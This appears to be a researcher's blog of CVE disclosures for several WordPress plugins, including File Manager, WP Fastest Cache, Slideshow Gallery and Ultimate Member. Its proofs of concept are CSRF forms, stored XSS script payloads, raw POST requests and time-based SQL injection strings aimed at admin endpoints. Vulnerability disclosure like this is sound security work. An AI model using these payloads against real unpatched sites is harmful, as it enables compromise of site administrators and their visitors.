Tuesday, 2 April 2019

File Manager plugin for WordPress CVE-2018-16966 and CVE-2018-16967


Exploit Author : Mohammed Ansari S ( ansaert@gmail.com )
Discovered Date: September 11 2018
Affected Version: 3.0
Active installations: 200,000+


1# CSRF and stored XSS - CVE-2018-16966 and CVE-2018-16967
  1. Create *.html file


<form method="POST" action="http://localhost/wordpress498/wp-admin/admin.php?page=wp_file_manager_root">
  <input type="text" name="public_path" value="typepayload"><br />
  <input type="text" name="submit" value="Save Changes"><br />
 <input type="submit">
</form>

Payload: "><script>alert(1);</script>

public_path=%22%3E%3Cscript%3Ealert%282%29%3B%3C%2Fscript%3E

XSS and SQLi in Slideshow Gallery plugin for WordPress - CVE-2018-18017 to CVE-2018-18019

Exploit Author: Mohammed Ansari S ( ansaert@gmail.com )
Discovered Date: October 4 2018
Tested Version: 1.6.8
Active installations: 20,000+


#1 - SQLi vulnerability in Manage Galleries - CVE-2018-18018

Affected Vectors:
  1. Gallery[id]
  2. Gallery[title]
Locate → http://localhost/wordpress/wp-admin/admin.php?page=slideshow-galleries&method=save

Enter the Payload:

  1. Gallery[id]=1' AND SLEEP(5) AND 'XZlZ'='XZlZ
  2. Gallery[title]=ansa' OR SLEEP(5) AND 'jZQR'='jZQRn

#2 - XSS vulnerability in Manage Galleries - CVE-2018-18017

Affected Vectors:
  1. Gallery[id]
  2. Gallery[title]
Locate → http://localhost/wordpress/wp-admin/admin.php?page=slideshow-galleries&method=save

Enter the Payload:

  1. Gallery[id]=1'"><script>alert(1);</script>
  2. Gallery[title]="><script>alert(2);</script>

#3 - XSS vulnerability in Manage Slides - CVE-2018-18019

Affected Vectors:
  1. Slide[title]
  2. Slide[media_file] or Slide[image_url]

Locate:
http://localhost/wordpress498/wp-admin/admin.php?page=slideshow-slides&method=save

Enter the Payload:
  1. Slide[title] = ansa"><script>alert(1);</script>
  2. Slide[media_file] or Slide[image_url]= "><script>alert(2);</script>

CSRF & Multiple Stored XSS in WP Fastest Cache plugin for WordPress - CVE-2018-17583 to CVE-2018-17586

Exploit Author: Mohammed Ansari S ( ansaert@gmail.com )
Tested Version: 0.8.8.5
Discovered Date: September 26 2018
Fixed Version: 0.8.8.6
Fixed Date: October 9 2018
Active installations:700,000+


#1 - CVE-2018-17585 - XSS →  wpFastestCachePage options

Locate → http://localhost/wordpress/wp-admin/admin.php?page=wpfastestcacheoptions

Affected Vectors:
  1. wpFastestCachePreload_number
  2. wpFastestCacheLanguage

Exploit Request:

POST /wordpress/wp-admin/admin.php?page=wpfastestcacheoptions HTTP/1.1

wpFastestCachePreload_number=4<script>alert(1);</script>
wpFastestCacheLanguage=eng"><script>alert(2);</script>

#2 - CVE-2018-17586 - XSS - action → wpfc_save_timeout_pages

Affected Vectors:
  1. rules[0][content]

Exploit Request:

POST /wordpress498/wp-admin/admin-ajax.php HTTP/1.1

rules%5B0%5D%5Bcontent%5D=%22%3E%3Cscript%3Ealert(3)%3B%3C%2Fscript%3E

#3 - CVE-2018-17583 - XSS - action → wpfc_save_exclude_pages

Affected Vectors:
  1. rules[0][content]

Exploit Request:

POST /wordpress498/wp-admin/admin-ajax.php HTTP/1.1

rules%5B0%5D%5Bcontent%5D=%22%3E%3Cscript%3Ealert(4)%3B%3C%2Fscript%3E

#4 - CVE-2018-17584 - CSRF in page → wpfastestcacheoptions

  1. Create *.html file

<form method="POST" action="http://localhost/wordpress/wp-admin/admin.php?page=wpfastestcacheoptions">
<input type="text" name="wpFastestCachePage" value="options"><br />
  <input type="text" name="wpFastestCachePreload_number" value="Enter the payload"><br />
<input type="text" name="wpFastestCacheLanguage" value="engEnter the payload"><br />
  <input type="text" name="submit" value="Save Changes"><br />
 <input type="submit">
</form>

Payload: "><script>alert(1);</script>

CVE-2018-16254 to CVE-2018-16259 - XSS in Import any XML or CSV File for WordPress

Exploit Author: Mohammed Ansari S ( ansaert@gmail.com )
Date: August 21 2018
Affected Version: 3.4.9
Active installations: 100,000+
Plugin: https://wordpress.org/plugins/wp-all-import/

POC will be disclosed once it fixed. Waiting for developer approval.

CVE-2018-13136 - XSS in The Ultimate Member

Exploit Author: Mohammed Ansari(ansaert@gmail.com)
LinkedIn: https://www.linkedin.com/in/ansaert/
Discovered Date: June 8 2018
Affected Version: 2.0.17
Bug has been fixed in 2.0.18 on July 3, 2018.
Active installations: 100,000+           
Plugin: https://wordpress.org/plugins/ultimate-member/

Description

              Ultimate Member is the user profile & membership plugin for WordPress. The plugin makes it a breeze for users to sign-up and become members of your website. The plugin allows you to add beautiful user profiles to your site and is perfect for creating advanced online communities and membership sites. Lightweight and highly extendible, Ultimate Member will enable you to create almost any type of site where users can join and become members with absolute ease.

Classification

Type: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CWE: CWE-79

Proof of Concept

1.Create page title as <script>alert(1);</script>
2.Navigate Ultimate Members -> Settings, It ll reflected in General Tab

Affected vectors

All Vectors were affected by XSS. Because without proper validation or escaping while fetching all data from the page title. Example: Showing title in options(Drop down Box) um_options%5Bcore_user%5D=<script>alert(1);</script>
  1. um_options%5Bcore_user%5D → <script>alert(1);</script>
  2. um_options%5Bcore_login%5D → <script>alert(1);</script>
  3. um_options%5Bcore_register%5D → <script>alert(1);</script>
  4. um_options%5Bcore_members%5D → <script>alert(1);</script>
  5. um_options%5Bcore_logout%5D → <script>alert(1);</script>
  6. um_options%5Bcore_account%5D → <script>alert(1);</script>
  7. um_options%5Bcore_password-reset%5D → <script>alert(1);</script>

CVE-2018-13137 - XSS in The Events Manager

Exploit Author: Mohammed Ansari(ansaert@gmail.com)
LinkedIn: https://www.linkedin.com/in/ansaert/
Discovered Date: July 3 2018
Affected Version: 5.9.4 
Fixed Version: 5.9.5 Released on July 18 2018.
Active installations: 100,000+           
Plugin: https://wordpress.org/plugins/events-manager/

Description

Events Manager is a full-featured event registration plugin for WordPress based on the principles of flexibility, reliability and powerful features. Version 5 now makes events and locations WordPress Custom Post Types, allowing for more possibilities than ever before.

Classification

Type:  Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CWE: CWE-79

Proof of Concept

There is multiple stored XSS(Cross-site Scripting) in file events-manager/trunk/admin/settings/tabs/pages.php events-manager-options page. The reason - Unsanitized user's input from the following parameters:
dbem_cp_events_slug
dbem_cp_locations_slug
dbem_taxonomy_category_slug
dbem_taxonomy_tag_slug
Exploiting this vulnerability requires authentication.
Example:
Locate Event settings page http://xxxx/wordpress/wp-admin/edit.php?post_type=event&page=events-manager-options and enter the payload and click save changes. It ll reflected in settings page and other related pages.
dbem_cp_events_slug=events%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E

Wednesday, 31 October 2018

CVE-2018-14846 - Multiple Stored XSS in Multi Step Form

Exploit Author: Mohammed Ansari(ansaert@gmail.com)
LinkedIn: https://www.linkedin.com/in/ansaert/
Discovered Date: July 27 2018
Affected Version: 1.2.5
Fixed Version: 1.2.8 Released on Aug 3 2018.
Active installations: 7,000+           
Plugin: https://wordpress.org/plugins/multi-step-form/

Description

Multi Step Form has a drag & drop enabled form builder for quick and intuitive creation of nice-looking multi step forms. Forms can be embedded on any page or post with short codes.

Classification

Type:  Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CWE: CWE-79

Proof of Concept

There is multiple stored and reflected XSS vulnerabilities in file class-mondula-multistep-forms-admin.php in fw_wizard_save action. The reason - unsanitized user's input from the following parameters:
data[wizard][steps][0][title]
data[wizard][steps][0][headline]
data[wizard][steps][0][copy_text]
data[wizard][steps][0][parts][0][title]
data[wizard][steps][0][parts][0][blocks][0][label]
data[wizard][steps][0][parts][0][blocks][0][format]
data[wizard][steps][0][parts][0][blocks][1][label]
data[wizard][steps][0][parts][0][blocks][2][label]
data[wizard][steps][0][parts][0][blocks][3][label]
data[wizard][settings][thankyou]
Exploiting this vulnerability requires authentication.

Example:
Locate Multi step form and enter payload and Save. The values are passed via Ajax →  http://localhost/word496/wp-admin/admin-ajax.php
data%5Bwizard%5D%5Btitle%5D=My+Multi+Step+Form%22%3E%3Cscript%3Ealert(22)%3B%3C%2Fscript%3E

Screenshots of vulnerability